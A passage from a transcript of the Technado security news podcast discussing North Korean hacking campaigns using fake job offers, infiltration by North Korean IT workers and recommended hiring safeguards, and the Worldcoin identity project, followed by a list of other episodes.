spear phishing attacks. Der Spiegel reported that Komsuke hackers hid the attack servers behind addresses containing Uberlingen, a reference to deal defenses location in Uberlingen, southern Germany. The attackers also authenticate hosted authentic looking german language login pages that resembled those of telecommunication provider, telecom and email service GMX, suggesting that the attackers were bulk harvesting, logging credentials of german users. Mandiant could not be reached for a comment. So this was, this was just crazy that they went to these lengths to target the. So a professional hacking team linked to north korean German had broken into deal defense. Bada Bang. So. And they used fake job offers and advanced social engineering attacks. That was kind of like the big deal on this was that they were, they were reaching out to the employees of deal defense saying, hey, we're a us contractor, works in the same space. We see the work you're doing. It's amazing. We'd love to bring you on, download this PDF, fill out the form, so on and so forth. So again, we keep seeing North Korea using this tactic of jobs and employments as a ruse as a pretext for gaining access into these systems, either through direct employee or by targeting the employers or the employees of a target it. [01:12:34] Speaker A: And we saw this with nobe four several weeks ago. [01:12:37] Speaker B: Yeah. [01:12:37] Speaker A: And they of course caught the guy, which did good job, but. Yeah, good job. But know before is not the only company that has experienced this or talked about this. And in fact, segueing into our next piece, Google is warning folks about this. Google warns of north korean it workers have. That's an interesting title. Google warns of north korean it workers have infiltrated the us workforce. They're warning us. They're saying, hey, this is a problem. Just like Daniel just said, they're heredez older guys. [01:13:04] Speaker B: Good job. Yeah, good job. [01:13:06] Speaker A: I know that because of my mom. [01:13:08] Speaker B: It's Halloween now. So you got. It is. [01:13:09] Speaker A: And I got my Jack o lantern. [01:13:10] Speaker B: You do? Good job. [01:13:11] Speaker A: I am all set. So, yes. Anyway, Google's saying, hey, watch out for this. This is a real issue, real threat. And like you said, it's disguising basically themselves as non North Koreans, for lack of a better way to put it, infiltrating industries to generate revenue and potentially, I don't know, in the extreme sense, conduct espionage. In theory. In theory. Could be an outcome. Right? [01:13:36] Speaker B: Could be an outcome. That's exactly right. They listen, they don't care what you got, they want it. That's basically what it is. Now, they are typically targeting tech firms. [01:13:46] Speaker A: Sure. [01:13:46] Speaker B: Specifically. And why? Because they have the acumen to be able to act as an employee. Employee for one of those companies. What I really enjoyed about this hack, this article was this article goes into kind of showing you what that looks like. Right. That here is a resume that might be generated to be useful for these employees to kind of go in. It's like. So here we have on my screen. Learn more about me. Senior software engineer. Right? This is basically a part of this dude's resume, right? And then once they engage into getting into talking. So here we go. Senior software engineer. This is what this looks like. Now. I thought this would be interesting for the folks that are watching out. I know a lot of people because I spent a lot of time on LinkedIn. They're, like, struggling to find it work because massive layoffs that have happened here recently. So the market's kind of flooded. Well, just. Just copy what these folks are doing, because apparently it's working. Use them as a kind of a template to. Well, if I wanted to get a resume that's going to work, let me see what these North Koreans are doing, because they're obviously spending a lot of time learning what goes into a good resume to make them on the short list of possible hires so they can infiltrate these tech companies. Right. We hack right back. Cool. Show me the research. Show me what that looks like for, you know, research purposes. That's all. And then make your resume like theirs, except real, you know, except that you're a real person that can do this and is not malicious because they're obviously getting work. [01:15:27] Speaker A: You were talking a little bit before. We were kind of chatting about this before the show, about how maybe a good way or at least a good place to start as far as preventing against this kind of stuff is. Yes, we understand remote work is a reality now. Lots of people work remotely. Lots of companies employ these kind of positions. Understandable, right? That's the world we live in now. But to prevent against what happened at nobe four with, it was a deep fake image, deep fake employee that, or a deep fake voice or something that this person used basically to get away with this, to prevent against things like that. Have your initial round of, hey, we're accepting resumes. Maybe you conduct your initial interview over the phone or something like that, but once you get to the final four or five people, however many you narrow it down to for that position, fly them out and say, hey, we're doing all of our final interviews in person. And you're kind of talking about, like, the expense of that would be worth it to prevent against something like this from happening. [01:16:21] Speaker B: Yeah, it's kind of, kind of. Well, I understand why we haven't done that in history past. [01:16:26] Speaker A: Sure. [01:16:27] Speaker B: Now we're in a brave new world, right, where this is starting to become a thing. So it's worth it, probably for a lot of companies to think of it as insurance. You're just paying your insurance bill to go, you know what? Come on out. Let's fly you in, get you a nice dinner, and even if you don't make it to the last round, we appreciate your time and your effort, and you didn't walk away with nothing. You got a nice little trip to our headquarters. We took you out for a dinner, and you got to meet some cool people. And if you were cool in the interview, even though you didn't make it, please feel free to use this as a reference and that kind of thing, you start to build relationships with people. So there's a good benefit to doing this. The last round of interviewing in person, not forgetting the idea that some north korean hacker might be trying to access into your systems. So it's a win win for everybody to do it that way. And cheap insurance on the back end. [01:17:21] Speaker A: Well, now that you say that, you remember Madeline, who used to work here, used to have somebody who worked on our production team. Madeline. She's since moved, but she was looking at jobs, remote jobs, out of state, and applied for one, and she's got an interview with them, or she talked to them over the phone, did a preliminary thing. Her final interview is in person. They said, hey, come on out. You can either we'll help you fly up, or you can drive. And she's gonna, like, make a weekend out of it. And, yeah, I'll go see the city and whatever and go to this. So I doubt in that case it's to prevent against north korean hackers, but I think you're right. And I heard about that. I'm like, that's so cool that they're like, yeah, come out for an in person interview. And then, hey, if you decide you want to move out here, you've already seen the location. But at the same time, even for remote work, we've met you. We now have an idea of, and even personality wise, whether you are a good fit for this position or for this organization. I think there's a lot of benefits that could come with doing something like that. [01:18:07] Speaker B: Absolutely. And other mitigations in this article. And this is what I really wanted to put this article in, because it. It shows you a lot that they've recommended. So they say. It has been recommended that organizations implement stringent vetting processes to detect DPRK it workers. These processes include requiring biometric information for background checks, conducting thorough interviews with cameras. So none of this, my camera doesn't work stuff. If your camera don't work, then we'll reschedule. Right? Verifying identity through notarized proof. Organizations should also train HR departments to identify inconsistencies and candidate profiles. Monitor for AI to modify profile pictures, which can be can help organizations mitigate the threat posed by North Korea cyber actors. To mitigate more, they must verify phone numbers for VoIP usage, confirm laptop geolocation matches reported residency, restrict remote administration tools, monitor VPN connections and detect mouse jiggling software. Additional verify laptop serial numbers. Implementing hardware based multi factor authentication. Restricting IP based kvms can strengthen the security against. And of course, to mitigate remote employee risks, implement periodic video checks, provide ongoing security education, collaborate with threat intelligence communities and restrict financial transactions to us banks. So lots of mitigation to be done on this. Obviously, we're kind of on the edge of this happening. This is just now becoming a real problem. [01:19:37] Speaker A: Brave new world. [01:19:38] Speaker B: So you got a lot of work to do. [01:19:39] Speaker A: This is just kind of an aside, but I was doing a little bit of googling. You know, we talked about Kia earlier and the security issue. You know, Kia is a korean car brand. [01:19:46] Speaker B: Oh, yes, I did know that. [01:19:47] Speaker A: And they were founded the year before north and South Korea split. [01:19:50] Speaker B: Did they really? [01:19:50] Speaker A: Yeah, 1944. And the split started in 45. [01:19:53] Speaker B: How about that? [01:19:53] Speaker A: So, tinfoil hat time, the Kia hack, it was due to north korean infiltrators. They're back. So anyway, fun fact, I did not know that Kia was a korean brand. Now, I know I don't drive a Kia, so it doesn't matter. But I know we're pushing on time. We won't spend too much time on this last one, partially because I just wanted to throw it in. [01:20:14] Speaker B: Kind of an interesting thing. [01:20:15] Speaker A: It's a little interesting idea. So if you haven't heard, there's this thing called world coin. The way this article frames it is fighting deepfakes and bots with global permissionless blockchain identity. And essentially, to probably oversimplify it, it sounds like this is basically, if it plays out, going to work like almost a virtual id card or a virtual passport. And the goal eventually is to have everybody using this blockchain identity system to prove, basically that you are a real person in the midst of, you know, the dead Internet theory about how there are so many AI generated, you know, so much AI generated content. [01:20:47] Speaker B: At least 40% of Internet traffic is like bots, bots. [01:20:51] Speaker A: So to prevent against that kind of stuff and to prevent against, you know, people pretending to be somebody they're not. And pushing, you know, malicious stuff or whatever. You gotta provide this, you know, proof that you are a real person surfing the Internet, which is kind of the opposite, I think, of what the Internet started out as, which is most everybody was pretty anonymous. [01:21:07] Speaker B: Yeah. [01:21:08] Speaker A: And of course there's, hey, this is great because it can prevent against this bad stuff happening. But to me, this makes me a little nervous. Not cause I'm trying to do bad stuff, but just because I don't like the idea that I've got to then basically retain, in theory, in the future, I've got to retain an online id card. [01:21:23] Speaker B: Just the mark of the beast. [01:21:24] Speaker A: Just you say that. [01:21:27] Speaker B: Oh, tinfoil hat me. Come on now. [01:21:29] Speaker A: Say that one of my family members is going to watch this and be like, well, hey, it actually is. You know, it's. It's a theory. So I just don't love the idea that in order to do anything online, in theory, maybe in the future. Let me see some id. Come on. I'm trying to buy stuff, papers, whatever. [01:21:46] Speaker B: Velvet. [01:21:47] Speaker A: So I don't love this idea. We'd love to know what y'all think about it. I'm curious. We have limited information on this, but what's your opinion on that idea? [01:21:54] Speaker B: You know, I'm just getting more and more paranoid in my old age, I guess. And I don't trust the government, so there's that. [01:22:04] Speaker A: Valid. [01:22:04] Speaker B: I just don't. They have yet to prove trustworthy. [01:22:07] Speaker A: Haven't given us a lot to trust, have they? [01:22:09] Speaker B: Really kick you every time you go, you know what I think? Oh, yeah, they got me again. That hurt. That was a good one. You got me right this side of the head. So if that's gonna be the entity, it would have to be some. And even if then, I don't know, you'd have to show me some real robust protections because we have other things, correct me if I'm wrong, that are on the blockchain and they have been kind of compromised. [01:22:38] Speaker A: It's. It's not impossible. [01:22:40] Speaker B: Right? So what makes this gonna be any different? [01:22:43] Speaker A: Yeah, that's a good point. This comes from a it's world coin slash TFH identity solution is how they're branding this. But it's a. TFH is the company. It is a nonprofit organization founded by OpenAI's Sam Altman and it was founded back in 2010. Okay, so this organization's been around for a. For a little hot minute. You know, it's a long article. This it is. So I'll put it in the description so y'all can. Can look more in detail. A lot of it is. I don't want to trash talk the author of this article, but a lot of it does seem to be, like, biased in favor, I guess. [01:23:19] Speaker B: Op ed of. [01:23:20] Speaker A: Yeah, biased in favor of this kind of a tool, which I guess you're gonna have bias either way. It could be biased the other direction. Like, this is the devil, you know? So it. You're never gonna fully be able to win with stuff like that. But I do think it's interesting. It's founded by the same guy that founded OpenAI. Yeah. Kind of a fun coincidence. And the purpose of it is to prove humanity, basically prove that you are a human on the Internet and not a bot. So, in theory, best. You know, it's good intentions, right? Best plans. But I don't know. It just. [01:23:48] Speaker B: The Internet will ever get to the part where it's just bots talking to bots. [01:23:53] Speaker A: I was thinking, because, I mean, I guess to get away from this. I don't know, would you go to the dark web and start just doing all your stuff there? I would wonder if something like this became implemented widespread, and people like us that are like, we don't love that idea, maybe we don't want to use it. Or people like, even my parents, that are like, hey, I don't like the idea of you forcing me to do anything. Right? Like, totally get that. You get to a point where you're forced to do enough stuff, and you're like, quit making me do stuff. Leave me alone. [01:24:16] Speaker B: I really don't like being, like, my. Yeah, forced. [01:24:18] Speaker A: Leave me alone. Give me the information. Let me make the decision, but quit forcing stuff on me. Yeah, same with the ads. Quit forcing stuff. [01:24:24] Speaker B: Give me the option. [01:24:24] Speaker A: Give me the option. [01:24:25] Speaker B: Yeah. [01:24:25] Speaker A: So, I could see this is getting way into theoretical territory, but I wonder if you would see people then start to move to the dark web, plus then would not. [01:24:34] Speaker B: So, if I've got some sort of, like, digital identity assigned to me and everything I do on the Internet, and it, would this be a part of the ledger on the blockchain? [01:24:47] Speaker A: I don't know. [01:24:48] Speaker B: Right. Would that be being tracked in the ledger? Every site I go to, everything I do, everything I click, everybody. You start to see the problem there. Yeah, I don't like that. [01:24:58] Speaker A: And it's confirmed to belong to a living human by a double iris scan. So then they've got your, you know, biometric information and. Because, I guess, how else do you prove you're human? [01:25:06] Speaker B: So, honestly, though, like, question, what do I care that there's bots on the Internet? How does that affect me? [01:25:14] Speaker A: Yeah. [01:25:15] Speaker B: Right. [01:25:15] Speaker A: Yeah. [01:25:16] Speaker B: Probably me personally. It doesn't so much, because I have very limited social media. [01:25:19] Speaker A: Sure. [01:25:20] Speaker B: Right. [01:25:21] Speaker A: Maybe that's a good thing that'll come out of all this. People will start using social media less because they get tired of the bots. [01:25:25] Speaker B: Right. Cause it's all bots. [01:25:26] Speaker A: We'll revert back to how we were realized. [01:25:28] Speaker B: The well is poison, and you just stop drinking out of it. [01:25:32] Speaker A: So I. Yeah, I don't love the idea of this world id world chain stuff. And I remember reading about it months ago, and it was like, very. Oh, hey, what a dream in a dream world and could very quickly become reality. So I don't love it. Would love to hear what y'all think about that. I won't dwell on it any longer because I know we're running long, but. [01:25:50] Speaker B: I see this being useful for something like news outlets to prove that. Prove that this isn't like an AI generated news story, like a human actually did. Like, if you're a journalist, you have a journalistic. It's like your press pass to the Internet. [01:26:04] Speaker A: Sure. [01:26:04] Speaker B: Right. And then everything you do, just. Just with that. Not as a person, but just as a journalist or something like that. That way we can verify the facts and the story are true, that you did write it, and that we can confirm all these things, or we'll revert back to. That's where it seems to, like, be useful. [01:26:22] Speaker A: Sure. In very specific use cases. Yeah. Specific careers or whatever. [01:26:26] Speaker B: If I was in politics or something to that effect or a public figure, everything can be kind of tied to that. But as rando users on the Internet, what's the point? What do you need that for? [01:26:35] Speaker A: Yeah, other that. Or if we don't do something like that regarding news content, we'll just revert back to getting the newspaper every day. [01:26:40] Speaker B: Right. [01:26:40] Speaker A: No more digital news. [01:26:41] Speaker B: How is that gonna stop something like the YouTube algorithm from promoting stuff that it wants to promote? [01:26:48] Speaker A: Yeah. [01:26:48] Speaker B: Right. [01:26:50] Speaker A: It's a good point. It's. [01:26:51] Speaker B: Maybe there is. I don't know. [01:26:53] Speaker A: It's a solution to a problem, but isn't necessary. [01:26:56] Speaker B: We're looking for a nail. [01:26:57] Speaker A: Yeah. Is it necessary? I don't know. [01:27:00] Speaker B: Maybe in some ways, maybe in some ways not. [01:27:02] Speaker A: But, hey, maybe somebody will comment and be like, hey, I think you're totally wrong. So please, you know, enlighten us. Let us know. [01:27:08] Speaker B: Here's the thing. We're just people reading stories on the Internet. [01:27:13] Speaker A: We are people. [01:27:14] Speaker B: I do not know the entirety of the world history on every subject that we talk about. Some of this stuff. I just read an article and was like, that seems interesting. [01:27:22] Speaker A: Yeah. We are not AI generated, though. We are real people and that's how. [01:27:25] Speaker B: You know, we're real. [01:27:26] Speaker A: We'll add. We'll add our world chain id to this technique. [01:27:29] Speaker B: Yeah. Would we qualify as journalists at this point if we're just reading the news from other people that may have. [01:27:33] Speaker A: I don't know if I want to. [01:27:34] Speaker B: I don't either. [01:27:35] Speaker A: I don't think I want that title. [01:27:37] Speaker B: I'll shut the Technato down tomorrow if that's what's up. [01:27:42] Speaker A: Well, we'll call it there before I get in trouble. No, this was a little bit of a longer one, but hopefully you enjoyed the news pieces this week. We will see you next week in Deadwood. But until then, we hope you enjoyed this episode. We'll see you next time. Thanks for watching. If you enjoyed today's show, consider subscribing so you'll never miss a new episode.

Other Episodes

Episode

September 17, 2020 00:52:12
Episode Cover

Technado, Ep. 169: Gravwell’s Corey Thuen

This week, Technado welcomed back an old friend, Corey Thuen from Gravwell, to tell us all about their Big Bang product launch. Corey also...

Listen

Episode

May 14, 2020 00:55:33
Episode Cover

Technado, Ep. 151: Microsoft’s Jeffrey Snover

PowerShell, I am your father. That’s right – Jeffrey Snover, the father of PowerShell was this week’s guest on Technado. We talked about where...

Listen

Episode 376

September 05, 2024 01:14:24
Episode Cover

376: Real-Life Infinite Money Glitch?! (AKA: Check Fraud for Beginners)

Yubico security keys can be cloned, D-Link isn't fixing critical router flaws, and an Ohio city is suing a researcher for colluding with a...

Listen